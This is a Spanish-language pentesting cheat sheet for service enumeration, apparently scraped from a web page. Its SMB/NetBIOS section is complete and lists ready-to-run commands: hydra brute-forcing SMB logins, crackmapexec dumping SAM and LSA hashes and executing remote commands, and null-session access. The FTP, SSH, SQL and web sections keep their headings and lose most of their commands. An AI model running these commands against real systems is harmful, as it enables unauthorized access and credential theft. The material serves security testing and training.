Enumeración
SMB y NetBIOS
Los puertos a revisar son:
138 UDP (datagram services)
139 TCP (session services)
445 TCP (Microsoft-DS)
Validación de si está corriendo el protocolo NetBIOS:
nmap -sS -sU -p137,138,139,445 --open -Pn -n 192.168.1.1Si dentro de la consulta del comando se tiene un valor numérico
<20>, equivale a un server service, que corresponde a archivos e impresoras compartidas.
Chequeo de si posee algún share:
nbtstat -n
nbtstat -A 192.168.1.1
nbtstat -a hostname-nlista NetBIOS locales-Alista NetBIOS remotos usando dirección IP-alista NetBIOS remotos usando hostname
Chequeo de si posee algún share:
nbtscan -v 192.168.1.1
nbtscan -v 192.168.1.0/24-vverbose
Validar si el target se encuentra compartiendo algún recurso:
smbclient -L 192.168.1.1-Llista los recursos compartidos del target
Chequear el contenido de los shares:
net use K: \\192.168.1.1\cSe ingresa la letra del volumen donde queremos montar el share.
smbmap -u 'admin' -p 'pass' -d MYGROUP -H 192.168.1.1
smbmap -u 'admin' -p 'pass' -H 192.168.1.1
smbmap -H 192.168.1.1
smbmap -u 'admin' -p 'pass' -d domain.com -H 192.168.1.1 -x 'ipconfig /all'
smbmap -L -u '' -p '' -H 192.168.1.1
smbmap -r -u '' -p '' -H 192.168.1.1-uindicamos el usuario para autenticarnos-ppassword de autenticación-ddominio del usuario, por defecto es WORKGROUP-Htarget-Llista todas las unidades del target-rlista el contenido de un directorio, por defecto es la raíz de todos los shares
nmblookup -A 192.168.1.1hydra -L users.txt -P /usr/share/john/password.lst 192.168.1.1 smb
hydra -L users.txt -P /usr/share/john/password.lst 192.168.1.1 smb -f-fespecifica que se cierre después del primer usuario válido
Para obtener información sobre el OS del target:
crackmapexec smb 192.168.1.1Si queremos obtener los shares, discos, sesiones, usuarios logueados o políticas de contraseñas del target, usar los siguientes comandos:
crackmapexec smb 192.168.1.1 -u '' -p '' --shares
crackmapexec smb 192.168.1.1 -u '' -p '' --local-auth --shares
crackmapexec smb 192.168.1.1 -u '' -p '' -d '' --shares
crackmapexec smb 192.168.1.1 -u '' -p '' --share share_name
crackmapexec smb 192.168.1.1 -u '' -p '' --sessions
crackmapexec smb 192.168.1.1 -u '' -p '' --disks
crackmapexec smb 192.168.1.1 -u '' -p '' --loggedon-users
crackmapexec smb 192.168.1.1 -u '' -p '' --pass-polObtener hashes:
crackmapexec smb 192.168.1.1 -u '' -p '' -d '' --sam
crackmapexec smb 192.168.1.1 -u '' -p '' -d '' --lsaEjecución de comandos:
crackmapexec smb 192.168.1.1 -u '' -p '' -x BATCH_COMMAND
crackmapexec smb 192.168.1.1 -u '' -p '' -X PS_COMMANDNull Session
Validar si podemos obtener información sin usar un usuario válido.
net use \\192.168.1.1\IPC$ "" /u:""Si se posee una respuesta
The command completed successfullyes que tenemos un null sessionEl primer valor entre comillas es la password y el parámetro
/u:""es el usuario (ambos deben esta vacíos)
winfo 192.168.1.1 -n-nindica que se establecerá una null session
Podemos ingresar usando rpcclient, o podemos usar un comando oneline.
Si ingresamos usando rpcclient, usamos el siguiente comando:
Luego, podemos usar los siguiente comandos:
-Nno envía una password-U ''dejamos el usuario vacíoenumdomusersenumeramos usuarios del dominioenumalsgroupsenumerar alias de grupossrvinfoinformación del servidorlookupnamesbuscamos nombresqueryuserinformación de consultas de usuarioenumprivsenumeramos los privilegios
Cuando queremos hacer esto en una sola línea, usar el siguiente comando:
FTP
-sVidentificación de la versión del servicio-script *ftp*usamos los scripts asociados a FTP--script-args=unsafe=1se ejecutarán secuencias de comandos que están casi (o totalmente) garantizadas para bloquear un sistema vulnerable. No se recomienda usar este parámetro en un entorno productivo
Se recomienda realizar el siguiente checklist:
Autenticarse con credenciales anonimas:
Descargar archivos:
Subir archivos:
SSH
Validamos versión del servicio SSH:
Enumeramos usuarios válidos:
Hydra:
Metasploit:
SNMP
SMTP
El script se encuentra en el siguiente link.
RPC Bind y NFS
Si tenemos una carpeta compartida, podemos montarla de la siguiente forma:
En caso de que no tengamos permisos para ver los archivos de dicha carpeta, o estos aparezcan con el usuario nobody, debemos crear uno con el mismo nombre, UID y GID obtenido del comando NMAP:
SQL
Información extra.
Enumeración usando NMAP:
Enumeración usando Metasploit módulo mssql_ping:
Fuerza bruta al login:
Autenticarse y ejecución de comandos:
Web
Buscar usuarios en el certificado SSL/TLS
Ver el código fuente
Validar los archivos
robots.txt,.htaccess,.htpasswdVer la consola del navegador
Ejecutar un crawler usando Burp Suite
Enumerar usando sslyze:
Enumerar usando NMAP:
Buscar información en los headers HTTP:
Enumerar usando nikto:
Enumerar directorios web:
Enumeración usando wpscan:
Enumeración usando CMSmap:
Enumeración usando
Enumeración usando CMSmap:
Last updated